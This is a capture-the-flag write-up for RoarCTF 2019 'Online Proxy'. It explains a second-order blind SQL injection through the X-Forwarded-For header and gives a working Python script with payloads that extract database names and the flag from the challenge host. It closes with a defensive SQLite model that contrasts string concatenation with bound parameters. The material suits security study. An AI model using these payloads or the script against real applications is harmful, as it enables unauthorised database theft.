[RoarCTF 2019]Online Proxy

Challenge


Key points

  • X-Forwarded-For injection
  • Second-order injection
  • Blind injection

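After reading the writeup, I learned that the injection point is the X-Forwarded-For header, and that it is a second-order injection.

The value is echoed back here: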

image

For the first request we send:

1' or '1

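For the second and third requests we send the same value, for example 111.

Because the first input, 1' or '1, differs from the second input, 111, the page echoes: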

image

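At this point 1' or '1 has already been stored in the database. Since 111 differs from 1' or '1, the server does not look up 1' or '1 in the database; it simply displays the previous IP.

When we send 111 once more (the third request), it matches the 111 sent before, which simulates an IP that has stopped changing. The server now has to fetch the last IP for 111 from the database, and in doing so executes 1' or '1.

Here is the code. Note that the flag is not in the current database.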

# coding:utf-8
import requests
import time

url = 'http://node3.buuoj.cn:25869/'
# The same track_uuid cookie is sent on every request so that all three
# requests of one probe belong to the same client record
cookie = 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3'


def send(xff):
    # One POST carrying the given X-Forwarded-For value
    headers = {'Cookie': cookie, 'X-Forwarded-For': xff}
    return requests.post(url=url, headers=headers)


res = ''
for i in range(1, 200):
    print(i)
    # Binary search over the ASCII value of the i-th character
    left = 31
    right = 127
    mid = left + ((right - left) >> 1)
    while left < right:
        #payload = "0' or (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{}) or '0".format(i,mid)
        #payload  = "0' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'F4l9_D4t4B45e'),{},1))>{}) or '0".format(i,mid)
        #payload  = "0' or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e'),{},1))>{}) or '0".format(i,mid)
        payload = "0' or (ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(i, mid)
        send(payload)    # request 1: the payload is stored as the client's IP
        send('111')      # request 2: the value differs, the previous IP is shown directly
        r = send('111')  # request 3: same value again, the stored payload is evaluated

        if r.status_code == 429:
            print('too fast')
            time.sleep(2)
            continue  # rate limited: repeat this probe instead of reading a 429 body
        if 'Last Ip: 1' in r.text:
            left = mid + 1
        else:
            right = mid
        mid = left + ((right - left) >> 1)
    # Hitting either bound means there is no further character to read
    if mid == 31 or mid == 127:
        break
    res += chr(mid)
    print(str(mid), res)
    time.sleep(1)
# Databases: information_schema,ctftraining,mysql,performance_schema,test,ctf,F4l9_D4t4B45e
# Table: F4l9_t4b1e
# Column: F4l9_C01uMn
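
As an added example (not part of the original writeup and not the challenge's source), this self-contained Python/SQLite model shows the defensive lesson behind the three-request sequence: a value that was stored safely becomes SQL once it is read back and concatenated into a later statement. The table layout, the `new_db`, `visit` and `replay` helpers, the UUID and the server logic are all assumptions chosen to reproduce the behaviour described above.

```python
import sqlite3

def new_db():
    db = sqlite3.connect(":memory:")
    # last_ip has no declared type, so SQLite stores whatever the expression yields
    db.execute("CREATE TABLE ip_log (uuid TEXT PRIMARY KEY, current_ip TEXT, last_ip)")
    return db

def visit(db, uuid, ip, safe):
    """Process one request; return the text shown after 'Last Ip:'."""
    row = db.execute(
        "SELECT current_ip, last_ip FROM ip_log WHERE uuid = ?", (uuid,)
    ).fetchone()
    last_ip = ""
    if row:
        current_ip, stored_last = row
        # Changed IP: show the previous one directly. Same IP: reuse the stored value.
        last_ip = current_ip if ip != current_ip else stored_last
        db.execute("DELETE FROM ip_log WHERE uuid = ?", (uuid,))
    if safe:
        # Hardened: the value read back from the database is bound like any other input
        db.execute("INSERT INTO ip_log VALUES (?, ?, ?)", (uuid, ip, last_ip))
    else:
        # Flawed: data that came out of the database is trusted and spliced into SQL,
        # so a stored quote turns the value into an expression that gets evaluated
        db.execute("INSERT INTO ip_log VALUES (?, ?, '%s')" % last_ip, (uuid, ip))
    return str(last_ip)

def replay(safe):
    """Replay the page's three X-Forwarded-For values against a fresh database."""
    db = new_db()
    # "constructed-uuid" is a made-up client id standing in for the track_uuid cookie
    return [visit(db, "constructed-uuid", xff, safe) for xff in ("1' or '1", "111", "111")]

if __name__ == "__main__":
    print("concatenated: ", replay(False))
    print("parameterized:", replay(True))
```

In this model the expression is evaluated when the stored value is written back, and its result (1) surfaces on the third request; with bound parameters the third request shows the literal text instead.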
